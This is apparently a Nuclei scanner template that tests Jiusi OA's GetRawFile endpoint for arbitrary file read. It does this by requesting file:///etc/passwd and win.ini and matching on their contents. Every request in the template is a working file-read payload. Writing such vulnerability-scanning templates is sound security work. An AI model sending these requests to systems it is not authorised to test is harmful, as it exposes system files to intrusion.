id: jsoa-fileRead

info:
  name: 九思OA GetRawFile 任意文件读取
  author: Str1am
  severity: medium
  tags: jsoa,fileRead

requests:
  - method: GET
    path:
      - "{{BaseURL}}/jsoa/GetRawFile?url=file:///C:/windows/win.ini"
      - "{{BaseURL}}/jsoa/GetRawFile?url=file:///etc/passwd"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "root:x"
          - "extensions"
        part: body
        condition: or